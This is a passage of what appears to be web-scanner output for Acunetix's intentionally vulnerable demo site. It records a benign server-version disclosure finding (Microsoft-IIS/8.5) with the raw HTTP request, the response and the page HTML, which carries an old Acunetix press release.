pPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmNkZGQMFEFD4s6E4+L8NgEI5fU11kxKVg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKsmpfVDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMM7CCcDz0WSHUDA7sLxpWzaC0J1" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Method	POST
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 421 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 Content-Length: 3707 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 3,707 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwK30rH2AgL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBE1qoi%2FTB7mR4IysbuEg0lOgmHIs
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 18011
Response Body - size: 18,011 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsb